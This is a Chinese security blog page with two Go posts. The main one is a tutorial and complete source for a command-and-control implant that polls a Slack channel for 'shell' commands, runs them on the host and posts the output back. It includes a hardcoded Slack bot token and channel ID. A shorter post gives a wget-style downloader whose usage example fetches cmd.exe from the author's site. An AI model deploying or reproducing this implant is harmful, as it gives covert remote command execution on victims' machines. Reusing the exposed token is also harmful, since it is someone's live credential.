golang利用slack编写C2

Y4er — Sat, 03 Oct 2020 16:36:04 +0000

最近在学golang，恰好看到demon分析的golang slack c2，便想着自己也来写一写。

配置slack

注册账号什么的就不说了。访问 https://api.slack.com/ 点击 Start Building

创建一个app

左侧OAuth & Permissions -> Scopes 配置token权限，暂时先配置两个，之后用哪个再加。

然后往上翻点Install App to Workspace

点allow，然后会自动跳转到token界面，记住这个token。

xoxb-1413293450689-1403506559507-aWLcahb6cGLZWGHF61QPV17S

创建一个channel

记住你的channel链接https://app.slack.com/client/T01C58MD8L9/C01BS6GEUJH中的C01BS6GEUJH

通过 /invite @myslackbot把bot加到频道里。

然后在https://api.slack.com/methods是操作bot的所有api，先用https://api.slack.com/methods/conversations.history/test测试下获取聊天记录

配置好token和channel ID

点test之后获取到聊天记录

简单的流程知道了，接下来通过golang来操作api，以及编写我们的C2。

golang编写

package main

import (
    "fmt"
    "github.com/tidwall/gjson"
    "io/ioutil"
    "net/http"
    "os"
    "os/exec"
    "strings"
    "time"
)

const (
    History_api = "https://slack.com/api/conversations.history"
    PostMessage = "https://slack.com/api/chat.postMessage"
    Token       = "xoxb-1413293450689-1403506559507-aWLcahb6cGLZWGHF61QPV17S"
    Channel     = "C01BS6GEUJH"
)

func main() {
    for true {
        time.Sleep(time.Second * 10)
        result := getHistory()
        if strings.HasPrefix(result.Str, "shell") {
            cmdRes := ExecCommand(strings.Split(result.Str, " ")[1])
            putRes(cmdRes)
        } else if strings.HasPrefix(result.Str, "exit") {
            os.Exit(0)
        } else {
            fmt.Println("no command")
        }
    }
}

func getHistory() (result gjson.Result) {
    req, err := http.NewRequest("GET", History_api, nil)
    if err != nil {
        return gjson.Result{}
    }
    q := req.URL.Query()
    q.Add("token", Token)
    q.Add("channel", Channel)
    q.Add("pretty", "1")
    q.Add("limit", "1")
    req.URL.RawQuery = q.Encode()

    resp, err := http.DefaultClient.Do(req)
    if err != nil {
        return gjson.Result{}
    }
    defer resp.Body.Close()
    byte, _ := ioutil.ReadAll(resp.Body)
    result = gjson.GetBytes(byte, "messages.0.text")
    return
}

func putRes(res string) {
    req, err := http.NewRequest("POST", PostMessage, nil)
    if err != nil {
        return
    }
    p := req.URL.Query()
    p.Add("token", Token)
    p.Add("channel", Channel)
    p.Add("pretty", "1")
    p.Add("text", res)
    req.URL.RawQuery = p.Encode()
    resp, err := http.DefaultClient.Do(req)
    defer resp.Body.Close()
    if err != nil {
        return
    }

}

func ExecCommand(command string) (out string) {
    cmd := exec.Command(command)
    o, err := cmd.CombinedOutput()

    if err != nil {
        out = fmt.Sprintf("shell run error: n%sn", err)
    } else {
        out = fmt.Sprintf("combined out:n%sn", string(o))
    }
    return
}

看下效果

https://www.bilibili.com/video/BV1uk4y1C7oP/

自己偷偷摸摸实现了很多功能，就不放了，通过slack的API可以做很多事情。

golang实现的wget

Y4er — Thu, 24 Jan 2019 07:09:17 +0000

效果

代码

package main

import (
	"fmt"
	"io"
	"net/http"
	"os"
)

var url, path string

func main() {
	if len(os.Args) != 3 {
		fmt.Println("usage:wget.exe http://Y4er.com/cmd.exe cmd.exe")
		os.Exit(0)
	}
	url, path = os.Args[1], os.Args[2]
	fmt.Println("你要下载的文件是：" + url)
	fmt.Println("将要保存到：" + path)
	Download(url, path)
}
func Download(url string, path string) {
	out, err := os.Create(path)
	check(err)
	defer out.Close()

	res, err := http.Get(url)
	check(err)
	defer res.Body.Close()

	_, err = io.Copy(out, res.Body)
	check(err)
	fmt.Println("保存成功，自行检查" + path)
}
func check(err error) {
	if err != nil {
		panic(err)
	}
}

编译好的win64位下载链接：http://Y4er.com/file/go-wget.exe

golang – ChaBug安全

golang利用slack编写C2

配置slack

golang编写

golang实现的wget

效果

代码